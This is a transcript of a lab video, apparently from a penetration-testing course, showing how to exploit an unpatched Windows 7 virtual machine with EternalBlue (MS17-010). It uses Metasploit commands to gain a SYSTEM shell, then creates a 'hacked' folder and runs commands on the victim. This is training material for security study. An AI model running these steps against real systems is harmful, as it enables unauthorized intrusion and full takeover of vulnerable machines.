All right. In this lab, we will be looking at EternalBlue, the very famous exploit that was discovered by the shadow brokers. So we will understand how to exploit a Windows VM with SMB and EternalBlue. And our mission is to execute the famous EternalBlue attack on a victim using Metasploit. So you're going to need your Kali Linux box, MSF console, Windows 7, and pfSense. As always, make sure your computers can talk to each other. So this is my Kali machine. I'm on 1.17, and my Windows machine, let's clear this out, is on 1.109. So let's go ahead and do a quick ping. 117. All right, and also you're going to make sure that your firewall is turned off. And you see right here, mine are set off for both home and public. Also make sure you can ping your Windows machine, 192.168.1.109, I believe. Yep. Okay, so we have connectivity on both sides. Next, let's go ahead and get into Metasploit framework. So let me clear out this and type MSF console. Oh, and I am using Kali 2019. All right, we are on version 5 of the Metasploit console framework. I'm just going to search EternalBlue. See, we have a whole bunch of different ones that we can do here. Let me expand my screen there. All right. And what we want to do is take advantage of the see, MS17010. So that's what we're going to do. We're going to use exploit slash Windows slash SMB MS17010 EternalBlue. Okay. As always, we've got lots of options. If you go to show options, see what you can actually choose and specify. So we got remote host, remote port, SMB domain for authentication, password, user, architecture, and other options. So let's go ahead and get ours staged and primed. So the first one is we want our remote host. So we'll say set our host 192.168.1.109. Okay. We're going to set our listening host. So we're going to say set L host. That's our Kali machine here. 192.168.1.117. All right, we're going to type show options. And you see here we got our remote host set, remote port set. Okay, so let's keep on going here, I think. And then we basically type in exploit and we'll see if we are successful or not. So it is trying right now. And we have it says it has completed successfully. Command shell opened. From there, so there's our Kali machine, and this is our Windows machine here. All right, and if I press enter, you see I got Windows System 32, which is nice. So what we want to do is we want to navigate to our users folder and create a folder called hacked to let them know that we were here. So let's go to cd c:/users. Whoops, cd So you got me, we got a couple others. Let's go ahead and let's go to Ian. So we'll do CD Ian, type in dir, we see all my different folders here. Let's navigate to my desktop. And we're going to make a directory called hacked. Then let's verify that this folder exists. Okay, very good. And let's check on my Windows machine here. And you can see my file was created. I have, I can type some other commands here. I can type calc.exe and then go back to my um, Windows machine here. This is a program is trying to run a display message. I can say view message, and look, there's the calculator on my computer here, right? What else? I can type um, who am I? That's the NT authority system. I can do lots of other things, right? So basically, I have access, or I have now owned this computer using the EternalBlue exploit. So like I said, it's pretty powerful. Works great on Windows 7. And that is the end of the lab. I will see you on the next one.